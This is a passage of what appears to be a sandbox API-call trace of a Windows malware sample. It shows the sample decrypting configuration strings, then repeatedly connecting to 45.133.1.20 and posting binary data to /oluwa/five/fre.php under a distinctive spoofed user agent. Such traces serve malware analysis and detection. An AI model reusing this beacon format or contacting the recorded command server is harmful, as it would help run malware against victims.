returned 0x6bd460 [0226.585] GetProcessHeap () returned 0x6a0000 [0226.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0226.585] GetProcessHeap () returned 0x6a0000 [0226.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0226.585] GetProcessHeap () returned 0x6a0000 [0226.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0226.586] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.587] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0226.587] GetProcessHeap () returned 0x6a0000 [0226.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0226.587] GetProcessHeap () returned 0x6a0000 [0226.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0226.588] send (s=0x6bc, buf=0x6b5c98*, len=242, flags=0) returned 242 [0226.588] send (s=0x6bc, buf=0x6bb998*, len=159, flags=0) returned 159 [0226.588] GetProcessHeap () returned 0x6a0000 [0226.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0226.588] recv (in: s=0x6bc, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0226.662] GetProcessHeap () returned 0x6a0000 [0226.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0226.663] GetProcessHeap () returned 0x6a0000 [0226.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0226.663] GetProcessHeap () returned 0x6a0000 [0226.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0226.664] GetProcessHeap () returned 0x6a0000 [0226.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0226.664] closesocket (s=0x6bc) returned 0 [0226.665] GetProcessHeap () returned 0x6a0000 [0226.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0226.665] GetProcessHeap () returned 0x6a0000 [0226.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0226.665] GetProcessHeap () returned 0x6a0000 [0226.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0226.667] GetProcessHeap () returned 0x6a0000 [0226.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0226.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1c4) returned 0x6bc [0226.670] Sleep (dwMilliseconds=0xea60) [0226.671] GetProcessHeap () returned 0x6a0000 [0226.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0226.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.673] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.682] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0226.694] GetProcessHeap () returned 0x6a0000 [0226.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0226.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.695] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0226.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.699] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.700] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.700] GetProcessHeap () returned 0x6a0000 [0226.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0226.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.702] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0226.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.703] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0226.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.704] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0226.704] GetProcessHeap () returned 0x6a0000 [0226.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0226.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.710] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.711] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.713] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0226.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.714] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0226.714] GetProcessHeap () returned 0x6a0000 [0226.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0226.714] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0226.714] GetProcessHeap () returned 0x6a0000 [0226.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0226.715] GetProcessHeap () returned 0x6a0000 [0226.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0226.715] GetProcessHeap () returned 0x6a0000 [0226.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0226.715] GetProcessHeap () returned 0x6a0000 [0226.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0226.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.716] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.725] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0226.735] GetProcessHeap () returned 0x6a0000 [0226.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0226.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.736] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0226.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.737] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.738] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.738] GetProcessHeap () returned 0x6a0000 [0226.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0226.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.743] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0226.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.745] CryptDestroyKey (hKey=0x6ad020) returned 1 [0226.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.746] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0226.746] GetProcessHeap () returned 0x6a0000 [0226.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0226.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.747] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0226.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.748] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0226.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.749] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0226.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.750] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0226.750] GetProcessHeap () returned 0x6a0000 [0226.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0226.750] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0226.750] GetProcessHeap () returned 0x6a0000 [0226.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0226.750] socket (af=2, type=1, protocol=6) returned 0x6c0 [0226.751] connect (s=0x6c0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0226.777] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0226.777] GetProcessHeap () returned 0x6a0000 [0226.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0226.777] GetProcessHeap () returned 0x6a0000 [0226.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0226.778] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.779] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0226.779] GetProcessHeap () returned 0x6a0000 [0226.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0226.779] GetProcessHeap () returned 0x6a0000 [0226.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0226.779] GetProcessHeap () returned 0x6a0000 [0226.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0226.779] GetProcessHeap () returned 0x6a0000 [0226.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0226.780] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.781] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0226.781] GetProcessHeap () returned 0x6a0000 [0226.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0226.781] GetProcessHeap () returned 0x6a0000 [0226.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0226.782] send (s=0x6c0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0226.783] send (s=0x6c0, buf=0x6bb998*, len=159, flags=0) returned 159 [0226.783] GetProcessHeap () returned 0x6a0000 [0226.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0226.784] recv (in: s=0x6c0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0226.872] GetProcessHeap () returned 0x6a0000 [0226.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0226.873] GetProcessHeap () returned 0x6a0000 [0226.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0226.874] GetProcessHeap () returned 0x6a0000 [0226.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0226.874] GetProcessHeap () returned 0x6a0000 [0226.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0226.874] closesocket (s=0x6c0) returned 0 [0226.875] GetProcessHeap () returned 0x6a0000 [0226.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0226.875] GetProcessHeap () returned 0x6a0000 [0226.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0226.876] GetProcessHeap () returned 0x6a0000 [0226.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0226.876] GetProcessHeap () returned 0x6a0000 [0226.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0226.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x930) returned 0x6c0 [0226.878] Sleep (dwMilliseconds=0xea60) [0226.880] GetProcessHeap () returned 0x6a0000 [0226.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0226.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.882] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0226.901] GetProcessHeap () returned 0x6a0000 [0226.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0226.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.902] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0226.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.909] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.910] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.910] GetProcessHeap () returned 0x6a0000 [0226.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0226.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.911] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0226.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.912] CryptDestroyKey (hKey=0x6ad060) returned 1 [0226.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.913] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0226.913] GetProcessHeap () returned 0x6a0000 [0226.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0226.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.914] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.915] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.916] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0226.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.916] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0226.917] GetProcessHeap () returned 0x6a0000 [0226.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0226.917] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0226.917] GetProcessHeap () returned 0x6a0000 [0226.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0226.917] GetProcessHeap () returned 0x6a0000 [0226.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0226.918] GetProcessHeap () returned 0x6a0000 [0226.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0226.918] GetProcessHeap () returned 0x6a0000 [0226.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0226.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.919] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.925] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0226.933] GetProcessHeap () returned 0x6a0000 [0226.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0226.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.934] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0226.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.936] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.937] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.937] GetProcessHeap () returned 0x6a0000 [0226.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0226.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.940] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0226.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.941] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0226.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.942] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0226.942] GetProcessHeap () returned 0x6a0000 [0226.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0226.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.943] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0226.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.944] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0226.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.948] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0226.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.951] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0226.951] GetProcessHeap () returned 0x6a0000 [0226.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0226.951] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0226.951] GetProcessHeap () returned 0x6a0000 [0226.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0226.951] socket (af=2, type=1, protocol=6) returned 0x6c4 [0226.952] connect (s=0x6c4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0226.982] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0226.982] GetProcessHeap () returned 0x6a0000 [0226.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0226.982] GetProcessHeap () returned 0x6a0000 [0226.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8710 [0226.983] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.984] wvsprintfA (in: param_1=0x6d8710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0226.984] GetProcessHeap () returned 0x6a0000 [0226.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0226.984] GetProcessHeap () returned 0x6a0000 [0226.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0226.984] GetProcessHeap () returned 0x6a0000 [0226.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0226.984] GetProcessHeap () returned 0x6a0000 [0226.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8710 [0226.985] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.986] wvsprintfA (in: param_1=0x6d8710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: 